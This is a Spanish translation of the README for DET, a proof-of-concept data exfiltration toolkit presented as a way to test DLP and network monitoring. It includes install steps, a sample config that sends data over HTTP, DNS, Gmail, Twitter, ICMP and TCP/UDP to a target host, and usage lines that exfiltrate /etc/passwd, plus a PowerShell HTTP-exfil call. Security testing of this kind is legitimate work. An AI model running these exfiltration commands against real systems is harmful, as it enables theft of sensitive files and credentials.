
(extensible) Kit de Exfiltración de Datos (DET)
DET (se proporciona TAL CUAL), es una prueba de concepto para realizar Exfiltración de Datos usando uno o múltiples canales al mismo tiempo.
Esta es una Prueba de Concepto destinada a identificar posibles fallos de DLP. Nunca debe usarse para exfiltrar datos sensibles/vivos (por ejemplo, en una evaluación)
La idea era crear un kit de herramientas genérico para conectar cualquier tipo de protocolo/servicio y probar la configuración de soluciones de Monitoreo de Red y Prevención de Fugas de Datos (DLP) implementadas, contra diferentes técnicas de exfiltración de datos.
El repositorio principal se ha movido ahora a aquí.
DET se presentó en BSides Ljubljana el 9 de marzo de 2016 y las diapositivas estarán disponibles aquí. Las diapositivas están disponibles aquí.
Clona el repositorio:
git clone https://github.com/sensepost/DET.git
Luego:
pip install -r requirements.txt --user
Para usar DET, necesitarás configurarlo y agregar tus ajustes adecuados (por ejemplo, SMTP/IMAP, frase de cifrado AES256, etc.). Se ha proporcionado un archivo de ejemplo de configuración llamado: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Para cargar todos los plugins:
python det.py -L -c ./config.json
Para cargar solo los módulos de twitter y gmail:
python det.py -L -c ./config.json -p twitter,gmail
Para cargar todos los plugins y excluir DNS:
python det.py -L -c ./config.json -e dns
Para cargar todos los plugins:
python det.py -c ./config.json -f /etc/passwd
Para cargar solo los módulos de twitter y gmail:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Para cargar todos los plugins y excluir DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
Y en PowerShell (módulo HTTP):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Hasta ahora, DET soporta múltiples protocolos, listados aquí:
Y otros "servicios":
Hasta ahora, estoy ocupado implementando nuevos módulos que están casi listos para lanzar, incluyendo:
Algunas referencias/créditos bastante interesantes de personas de las que me inspiré con su proyecto:
Puedes contactarme en Twitter @PaulWebSec. Siéntete libre de contribuir, clonar, bifurcar, enviar tu PR, etc.
DET está licenciado bajo una Licencia MIT. Se pueden obtener permisos más allá del alcance de esta licencia en [email protected].